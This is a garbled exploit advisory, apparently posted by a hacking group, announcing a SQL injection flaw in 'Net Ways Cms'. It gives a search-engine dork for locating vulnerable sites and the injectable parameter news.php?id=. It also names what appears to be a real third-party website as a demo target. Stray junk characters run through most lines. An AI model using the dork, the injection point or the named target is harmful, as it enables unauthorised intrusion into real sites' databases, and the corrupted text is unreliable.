################################################################################??######## ; s, T7 m3 U6 k, a- z
# $ M2 b' w6 L# }* G5 v1 U
# Exploit Title : Net Ways Cms Sql Injection Vulnerability
. L* o1 f4 D' S7 C9 m#
' L3 \& |2 n i8 r, ^* V% Z, n# Author : IrIsT.Ir
, G* |% J4 E3 O$ d: ^% L G: W# 1 ?' I5 i+ S/ Y3 r7 Z3 L
# Discovered By : Am!r 1 n" R* r6 M# t2 O
#
- U7 P% p+ y3 N2 r* h1 y# Home : http://IrIsT.Ir/forum
' C* r F; n% M2 Y- Z#
1 p4 d. a) H9 s# Software Link : http://www.netways.com/ www.political-security.com
1 P1 W, h/ S8 I#
! E% g0 z( }4 u/ f0 o# Security Risk : High
6 k( K0 H0 }) M: Y9 w#
3 Z' V7 j$ k7 P6 j4 r: y3 w# Version : All Version 4 b2 u' V0 g! ]* g& C+ G/ A, j; V
#
* ?+ `. }4 `/ b1 {4 d# Tested on : GNU/Linux Ubuntu - Windows Server - win7
3 w7 V5 C- u; |! [* G5 t# V- h- y# " s0 p4 |, e1 _- S i* S: _8 @ ?4 ]
# Dork : intext:"Designed & developed by NetWays"
% W2 t) X& M7 j3 U4 E: F: G; A#
# @3 K& }) S5 f# s, ]8 t. k################################################################################??######## 1 y# ?5 I6 U! c, g
#
- ~8 Z# `0 I2 X# r' T9 P( ~4 {# Expl0iTs : 8 i) m$ v2 U% p. s
# 0 i7 l0 P% d& x0 ]
# http://target.com/news.php?id=[Sql] 2 L! ]- c" P* J' A) N
# . d0 E' }2 T* i4 |6 _9 I& o
#
& }% a9 m9 b7 | i0 P: D. x# D3mo :
; B* k9 B2 I. W$ b4 ^#
& o9 e; X; ~: ?3 J8 j2 f# http://compagnieparento.com/news.php?id=7[Sql] & w3 _6 }5 u0 [% t
# - G7 J4 `/ F/ h
################################################################################??########
7 V# L. f. O2 T, R1 M8 ^1 k. y#
; g& s g2 z3 K: u# Greats : B3HZ4D - nimaarek - Dead.Zone - C0dex - SpooferNinja - TaK.FaNaR - Nafsh - BestC0d3r
- X4 L- H+ a$ y/ _& \ ]/ q#
4 h1 W8 a9 E" k& i# 0x0ptim0us - TaK.FaNaR - m3hdi - F@rid - Siamak.Black - H4x0r - dr.tofan - skote_vahshat - d3c0d3r
, S; E+ T% j" A1 l4 t+ [# # ^- n$ A! j1 V9 v1 n3 ?7 ?
# Mr.Xpr & M.R.S.CO & Mr.Cicili & H-SK33PY & All Members In Www.IrIsT.Ir/forum
1 t$ o! N- y% C2 E#
+ p; j+ n3 v6 M! P################################################################################??######## |